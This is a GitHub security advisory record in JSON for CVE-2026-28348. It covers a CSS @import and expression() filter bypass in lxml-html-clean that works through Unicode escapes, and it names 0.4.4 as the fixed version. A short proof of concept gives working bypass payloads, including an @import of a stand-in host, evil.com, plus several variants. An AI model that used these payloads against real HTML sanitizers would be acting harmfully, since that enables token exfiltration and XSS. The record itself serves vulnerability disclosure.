{"id":"GHSA-hw26-mmpg-fqfg","summary":"lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes","details":"### Summary\nThe `_has_sneaky_javascript()` method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the `@import` and `expression()` filters, allowing external CSS loading or XSS in older browsers.\n\n### Details\nThe root cause is located in `clean.py` (around line 594):\n```python\nstyle = style.replace('\\\\', '')\n```\nThis transformation changes a payload like `@\\69mport` into `@69mport`. This resulting string does NOT match the blacklist keyword `@import`. However, all modern browsers' CSS parsers decode `\\69` as the character 'i' (hex 69) according to CSS spec section 4.3.7, interpreting `@\\69mport` as a valid `@import` statement.\n\nSame root cause bypasses `expression()` detection: `\\65xpression(alert(1))` passes through (IE only).\n\n### PoC\n```python\nfrom lxml_html_clean import clean_html\n\n# Normal @import is correctly blocked:\n# clean_html('\u003cstyle\u003e@import url(\"http://evil.com/x.css\");\u003c/style\u003e')\n# Output: \u003cdiv\u003e\u003cstyle\u003e url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n\n# Unicode escape bypass:\nresult = clean_html('\u003cstyle\u003e@\\\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e')\nprint(result)\n# Output: \u003cdiv\u003e\u003cstyle\u003e@\\69mport url(\"http://evil.com/x.css\");\u003c/style\u003e\u003c/div\u003e\n```\nIf rendered in a browser, the browser loads the external CSS. Variants like `@\\0069mport`, `@\\69 mport` (trailing space), and `@\\49mport` (uppercase I) also work.\n\n### Impact\nExternal CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via `expression()`.","aliases":["CVE-2026-28348","PYSEC-2026-2201"],"modified":"2026-09-10T03:50:39.674211658Z","published":"2026-03-02T19:19:15Z","database_specific":{"cwe_ids":["CWE-116"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-03-02T19:19:15Z","nvd_published_at":"2026-03-05T20:16:16Z"},"references":[{"type":"WEB","url":"https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-hw26-mmpg-fqfg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28348"},{"type":"WEB","url":"https://github.com/fedora-python/lxml_html_clean/commit/2ef732667ddbc74ea59847bcf24b75809aaeed3b"},{"type":"PACKAGE","url":"https://github.com/fedora-python/lxml_html_clean"}],"affected":[{"package":{"name":"lxml-html-clean","ecosystem":"PyPI","purl":"pkg:pypi/lxml-html-clean"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.4.4"}]}],"versions":["0.1.0","0.1.1","0.2.0","0.2.1","0.2.2","0.3.0","0.3.1","0.4.0","0.4.1","0.4.2","0.4.3"],"database_specific":{"last_known_affected_version_range":"\u003c= 0.4.3","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-hw26-mmpg-fqfg/GHSA-hw26-mmpg-fqfg.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}]}